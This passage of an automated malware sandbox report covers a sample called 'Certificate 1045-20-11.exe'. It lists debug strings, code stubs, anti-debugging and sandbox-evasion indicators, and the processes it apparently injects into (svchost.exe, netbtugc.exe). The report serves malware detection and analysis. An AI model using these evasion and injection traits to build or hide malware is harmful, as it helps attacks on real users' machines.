            Source: Binary string: wntdll.pdbUGP source: Certificate 1045-20-11.exe, 00000000.00000003.1715042860.0000000003430000.00000004.00001000.00020000.00000000.sdmp, Certificate 1045-20-11.exe, 00000000.00000003.1719350842.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1871034857.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1778975404.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1871034857.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1780442944.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1871465604.000000000312E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4167728564.000000000347E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4167728564.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1868746207.0000000002F34000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Certificate 1045-20-11.exe, 00000000.00000003.1715042860.0000000003430000.00000004.00001000.00020000.00000000.sdmp, Certificate 1045-20-11.exe, 00000000.00000003.1719350842.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1871034857.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1778975404.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1871034857.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1780442944.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000003.00000003.1871465604.000000000312E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4167728564.000000000347E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4167728564.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1868746207.0000000002F34000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000002.1869223621.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1837507725.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000002.00000002.4165898672.00000000008D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000003.00000002.4168533677.000000000390C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4165640004.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.000000000269C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2165142022.00000000051EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000003.00000002.4168533677.000000000390C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4165640004.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.000000000269C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2165142022.00000000051EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000002.1869223621.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1837507725.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000002.00000002.4165898672.00000000008D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Certificate 1045-20-11.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Certificate 1045-20-11.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Certificate 1045-20-11.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Certificate 1045-20-11.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Certificate 1045-20-11.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0085E01E LoadLibraryA,GetProcAddress
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0086C09E push esi; ret 0_2_0086C0A0
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0086C187 push edi; ret 0_2_0086C189
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_008AC8BC push esi; ret 0_2_008AC8BE
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_00866B05 push ecx; ret 0_2_00866B18
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0088B2B1 push FFFFFF8Bh; iretd 0_2_0088B2B3
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0086BDAA push edi; ret 0_2_0086BDAC
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0086BEC3 push esi; ret 0_2_0086BEC5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0253E2BA push 00000038h; iretd 1_2_0253E2BE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_025248A9 push esp; ret 1_2_025248AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_025217E5 push ebp; retf 003Fh 1_2_025217E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02523780 push eax; ret 1_2_02523782
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_025347A2 push es; iretd 1_2_025347AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0253A436 push ebx; iretd 1_2_0253A600
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02538C92 pushad ; retf 1_2_02538C93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0253A5D9 push ebx; iretd 1_2_0253A600
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031309AD push ecx; mov dword ptr [esp], ecx 1_2_031309B6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_032E225F pushad ; ret 3_2_032E27F9
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_032E27FA pushad ; ret 3_2_032E27F9
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_033109AD push ecx; mov dword ptr [esp], ecx 3_2_033109B6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_032E283D push eax; iretd 3_2_032E2858
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_032E1368 push eax; iretd 3_2_032E1369
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_00770CE1 pushfd ; retf 3_2_00770D0B
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_00762238 pushad ; iretd 3_2_00762239
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_0076AB37 push 00000038h; iretd 3_2_0076AB3B
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_00766CB3 push ebx; iretd 3_2_00766E7D
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_00766E56 push ebx; iretd 3_2_00766E7D
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_00751126 push esp; ret 3_2_00751127
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_0076D1B0 push es; ret 3_2_0076D1D0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_0076550F pushad ; retf 3_2_00765510
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_0076FEF5 push FFFFFFBAh; ret 3_2_0076FEF7
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_0075FFA0 push esi; iretd 3_2_0075FFA5
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_008A8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0085EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0086123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeAPI/Special instruction interceptor: Address: EB0DAC
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AD1C0 rdtsc 1_2_031AD1C0
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 3279Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 6694Jump to behavior
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeEvaded block: after key decisiongraph_0-94329
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-94869
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeAPI coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3704Thread sleep count: 3279 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3704Thread sleep time: -6558000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3704Thread sleep count: 6694 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3704Thread sleep time: -13388000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe TID: 1344Thread sleep time: -65000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe TID: 1344Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe TID: 1344Thread sleep time: -34000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe Code function: 0_2_00886CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00886CA9
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe Code function: 0_2_008860DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_008860DD
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe Code function: 0_2_008863F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_008863F9
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe Code function: 0_2_0088EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0088EB60
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe Code function: 0_2_0088F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0088F5FA
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe Code function: 0_2_0088F56F FindFirstFileW,FindClose, 0_2_0088F56F
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe Code function: 0_2_00891B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00891B2F
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe Code function: 0_2_00891C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00891C8A
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe Code function: 0_2_00891F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00891F94
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 3_2_0076BAB0 FindFirstFileW,FindNextFileW,FindClose, 3_2_0076BAB0
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe Code function: 0_2_0085DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_0085DDC0
            Source: netbtugc.exe, 00000003.00000002.4165640004.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
            Source: firefox.exe, 00000008.00000002.2168495086.000001CC0512B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
            Source: FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4166318731.0000000000870000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe API call chain: ExitProcess graph end node graph_0-93560
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe API call chain: ExitProcess graph end node graph_0-94619
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\netbtugc.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031AD1C0 rdtsc 1_2_031AD1C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02537823 LdrLoadDll, 1_2_02537823
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe Code function: 0_2_00896AAF BlockInput, 0_2_00896AAF
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe Code function: 0_2_00843D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00843D19
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe Code function: 0_2_00873920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW, 0_2_00873920
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe Code function: 0_2_0085E01E LoadLibraryA,GetProcAddress, 0_2_0085E01E
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe Code function: 0_2_00EB1078 mov eax, dword ptr fs:[00000030h] 0_2_00EB1078
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe Code function: 0_2_00EB1018 mov eax, dword ptr fs:[00000030h] 0_2_00EB1018
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe Code function: 0_2_00EAF9C8 mov eax, dword ptr fs:[00000030h] 0_2_00EAF9C8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312C310 mov ecx, dword ptr fs:[00000030h] 1_2_0312C310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03150310 mov ecx, dword ptr fs:[00000030h] 1_2_03150310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B930B mov eax, dword ptr fs:[00000030h] 1_2_031B930B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B930B mov eax, dword ptr fs:[00000030h] 1_2_031B930B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B930B mov eax, dword ptr fs:[00000030h] 1_2_031B930B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h] 1_2_0316A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h] 1_2_0316A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h] 1_2_0316A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03127330 mov eax, dword ptr fs:[00000030h] 1_2_03127330
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031F132D mov eax, dword ptr fs:[00000030h] 1_2_031F132D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031F132D mov eax, dword ptr fs:[00000030h] 1_2_031F132D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0315F32A mov eax, dword ptr fs:[00000030h] 1_2_0315F32A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03129353 mov eax, dword ptr fs:[00000030h] 1_2_03129353
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03129353 mov eax, dword ptr fs:[00000030h] 1_2_03129353
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h] 1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h] 1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h] 1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B035C mov ecx, dword ptr fs:[00000030h] 1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h] 1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h] 1_2_031B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031FA352 mov eax, dword ptr fs:[00000030h] 1_2_031FA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h] 1_2_031B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312D34C mov eax, dword ptr fs:[00000030h] 1_2_0312D34C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312D34C mov eax, dword ptr fs:[00000030h] 1_2_0312D34C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03205341 mov eax, dword ptr fs:[00000030h] 1_2_03205341
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031D437C mov eax, dword ptr fs:[00000030h] 1_2_031D437C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03137370 mov eax, dword ptr fs:[00000030h] 1_2_03137370
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03137370 mov eax, dword ptr fs:[00000030h] 1_2_03137370
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03137370 mov eax, dword ptr fs:[00000030h] 1_2_03137370
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031EF367 mov eax, dword ptr fs:[00000030h] 1_2_031EF367
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0318739A mov eax, dword ptr fs:[00000030h] 1_2_0318739A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0318739A mov eax, dword ptr fs:[00000030h] 1_2_0318739A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03128397 mov eax, dword ptr fs:[00000030h] 1_2_03128397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03128397 mov eax, dword ptr fs:[00000030h] 1_2_03128397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03128397 mov eax, dword ptr fs:[00000030h] 1_2_03128397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h] 1_2_0312E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h] 1_2_0312E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h] 1_2_0312E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0315438F mov eax, dword ptr fs:[00000030h] 1_2_0315438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0315438F mov eax, dword ptr fs:[00000030h] 1_2_0315438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031533A5 mov eax, dword ptr fs:[00000030h] 1_2_031533A5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031633A0 mov eax, dword ptr fs:[00000030h] 1_2_031633A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031633A0 mov eax, dword ptr fs:[00000030h] 1_2_031633A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0320539D mov eax, dword ptr fs:[00000030h] 1_2_0320539D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031EB3D0 mov ecx, dword ptr fs:[00000030h] 1_2_031EB3D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031EC3CD mov eax, dword ptr fs:[00000030h] 1_2_031EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0313A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h] 1_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h] 1_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h] 1_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h] 1_2_031383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B63C0 mov eax, dword ptr fs:[00000030h] 1_2_031B63C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032053FC mov eax, dword ptr fs:[00000030h] 1_2_032053FC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031663FF mov eax, dword ptr fs:[00000030h] 1_2_031663FF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031EF3E6 mov eax, dword ptr fs:[00000030h] 1_2_031EF3E6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h] 1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h] 1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h] 1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h] 1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h] 1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h] 1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h] 1_2_031403E9
